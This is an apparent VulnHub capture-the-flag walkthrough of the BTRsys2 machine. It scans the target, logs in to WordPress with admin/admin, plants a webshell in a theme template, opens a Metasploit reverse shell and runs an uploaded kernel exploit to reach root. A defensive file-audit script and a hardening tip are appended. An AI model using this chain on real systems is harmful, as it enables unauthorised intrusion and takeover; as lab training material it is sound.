BTRsys2

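VulnHub Target Penetration: BTRsys2

1. Information gathering: the host IP is found to be 192.168.65.132

2. nmap port scan: nmap -T4 -A -v 192.168.65.132

3. Visit port 80 and run a directory scan

4. Visit robots.txt; a wordlist is found

5. Try weak passwords at the login page; login succeeds (username=admin passwd=admin)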


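6. A file upload is found under Posts; the upload fails

7. An editor is found under Appearance; PHP files can be edited

8. Write a one-line webshell, then visit http://192.168.65.132/wordpress/wp-content/themes/twentyfourteen/404.php; AntSword connects successfully

8. Reverse shell with msf

9. Privilege escalation

9.1 Check the current system information

9.2 Look for kernel vulnerabilities

9.3 Compile and upload; privilege escalation succeeds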
meterpreter > upload /home/kali/Desktop/exploit
[*] uploading  : /home/kali/Desktop/exploit -> exploit
[*] Uploaded -1.00 B of 23.22 KiB (-0.0%): /home/kali/Desktop/exploit -> exploit
[*] uploaded   : /home/kali/Desktop/exploit -> exploit
meterpreter > shell
Process 1286 created.
Channel 3 created.
pwd
/var/www/html/wordpress/wp-content/themes/twentyfourteen
ls -lh
total 832K
-rwxrwxrwx 1 btrisk       1000 1.1K Mar  9 08:40 404.php
-rw-r--r-- 1 www-data www-data  17K Mar  9 08:49 41458.c 
-rwxrwxrwx 1 btrisk       1000 2.2K Oct 12  2016 archive.php
-rwxrwxrwx 1 btrisk       1000 1.9K Oct 12  2016 author.php
-rwxrwxrwx 1 btrisk       1000 1.5K Oct 12  2016 category.php
-rwxrwxrwx 1 btrisk       1000 2.3K Oct 12  2016 comments.php
-rwxrwxrwx 1 btrisk       1000 2.2K Oct 12  2016 content-aside.php
-rwxrwxrwx 1 btrisk       1000 2.2K Oct 12  2016 content-audio.php
-rwxrwxrwx 1 btrisk       1000 1.1K Oct 12  2016 content-featured-post.php
-rwxrwxrwx 1 btrisk       1000 2.2K Oct 12  2016 content-gallery.php
-rwxrwxrwx 1 btrisk       1000 2.2K Oct 12  2016 content-image.php
-rwxrwxrwx 1 btrisk       1000 2.2K Oct 12  2016 content-link.php
-rwxrwxrwx 1 btrisk       1000  961 Oct 12  2016 content-none.php
-rwxrwxrwx 1 btrisk       1000  871 Oct 12  2016 content-page.php
-rwxrwxrwx 1 btrisk       1000 2.2K Oct 12  2016 content-quote.php
-rwxrwxrwx 1 btrisk       1000 2.2K Oct 12  2016 content-video.php
-rwxrwxrwx 1 btrisk       1000 2.2K Oct 12  2016 content.php
drwxrwxrwx 2 btrisk       1000 4.0K Apr 24  2017 css
-rw-r--r-- 1 www-data www-data  24K Mar  9 08:59 exploit
-rwxrwxrwx 1 btrisk       1000  946 Oct 12  2016 featured-content.php
-rwxrwxrwx 1 btrisk       1000  728 Oct 12  2016 footer.php
-rwxrwxrwx 1 btrisk       1000  16K Oct 12  2016 functions.php
drwxrwxrwx 3 btrisk       1000 4.0K Apr 24  2017 genericons
-rwxrwxrwx 1 btrisk       1000 2.3K Oct 12  2016 header.php
-rwxrwxrwx 1 btrisk       1000 2.6K Oct 12  2016 image.php
drwxrwxrwx 2 btrisk       1000 4.0K Apr 24  2017 images
drwxrwxrwx 2 btrisk       1000 4.0K Apr 24  2017 inc
-rwxrwxrwx 1 btrisk       1000 1.6K Oct 12  2016 index.php
drwxrwxrwx 2 btrisk       1000 4.0K Apr 24  2017 js
drwxrwxrwx 2 btrisk       1000 4.0K Apr 24  2017 languages
drwxrwxrwx 2 btrisk       1000 4.0K Apr 28  2017 page-templates
-rwxrwxrwx 1 btrisk       1000 1.2K Oct 12  2016 page.php
-rwxrwxrwx 1 btrisk       1000  16K Oct 12  2016 rtl.css
-rwxrwxrwx 1 btrisk       1000 603K Oct 12  2016 screenshot.png
-rwxrwxrwx 1 btrisk       1000 1.3K Oct 12  2016 search.php
-rwxrwxrwx 1 btrisk       1000  340 Oct 12  2016 sidebar-content.php
-rwxrwxrwx 1 btrisk       1000  395 Oct 12  2016 sidebar-footer.php
-rwxrwxrwx 1 btrisk       1000  848 Oct 12  2016 sidebar.php
-rwxrwxrwx 1 btrisk       1000 1.1K Oct 12  2016 single.php
-rwxrwxrwx 1 btrisk       1000 5.6K Mar  7 21:36 style.css
-rwxrwxrwx 1 btrisk       1000 1.6K Oct 12  2016 tag.php
-rwxrwxrwx 1 btrisk       1000 2.4K Oct 12  2016 taxonomy-post_format.php
chmod 777 exp*
./exp*
bash: cannot set terminal process group (840): Inappropriate ioctl for device
bash: no job control in this shell
root@ubuntu:/var/www/html/wordpress/wp-content/themes/twentyfourteen# 
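
A defender's view of the listing above, as an added example that is not part of the original write-up: it parses `ls -lh` output in that format and flags world-writable entries, files owned by the web server account, file types a theme should not contain, and recently changed PHP templates. Treating `www-data` as the web server account and the allowed-extension set are assumptions.

```python
import re

# Sample input: a subset of lines in the format of the `ls -lh` listing above.
SAMPLE = """\
-rwxrwxrwx 1 btrisk       1000 1.1K Mar  9 08:40 404.php
-rw-r--r-- 1 www-data www-data  17K Mar  9 08:49 41458.c
-rwxrwxrwx 1 btrisk       1000 2.2K Oct 12  2016 archive.php
drwxrwxrwx 2 btrisk       1000 4.0K Apr 24  2017 css
-rw-r--r-- 1 www-data www-data  24K Mar  9 08:59 exploit
-rwxrwxrwx 1 btrisk       1000 5.6K Mar  7 21:36 style.css
"""

LINE = re.compile(
    r"^(?P<mode>[-dl][rwxsStT-]{9})\s+\d+\s+(?P<owner>\S+)\s+(?P<group>\S+)\s+"
    r"(?P<size>\S+)\s+(?P<mon>\w{3})\s+(?P<day>\d+)\s+(?P<when>\S+)\s+(?P<name>.+?)\s*$"
)
# Assumptions, not from the page: the web server account name and the
# set of extensions a stock theme directory is expected to contain.
WEB_USER = "www-data"
THEME_EXTS = {".php", ".css", ".png", ".js", ".txt", ".pot", ".mo", ".po"}

def audit(listing, web_user=WEB_USER):
    """Return {name: [reasons]} for entries that deserve a closer look."""
    findings = {}
    for raw in listing.splitlines():
        m = LINE.match(raw)
        if not m:
            continue  # "total 832K", prompts, blank lines
        mode, name = m["mode"], m["name"]
        reasons = []
        if mode[8] == "w":
            reasons.append("world-writable")
        if m["owner"] == web_user:
            reasons.append("created by web server account")
        is_dir = mode[0] == "d"
        ext = "." + name.rsplit(".", 1)[1].lower() if "." in name else ""
        if not is_dir and ext not in THEME_EXTS:
            reasons.append("unexpected file type for a theme")
        # ls prints HH:MM instead of a year for files changed in the last ~6 months.
        if ":" in m["when"] and ext == ".php":
            reasons.append("PHP file modified recently")
        if reasons:
            findings[name] = reasons
    return findings

if __name__ == "__main__":
    for name, reasons in audit(SAMPLE).items():
        print(f"{name}: {', '.join(reasons)}")
```

Setting `DISALLOW_FILE_EDIT` to true in wp-config.php removes the dashboard editor used in step 7.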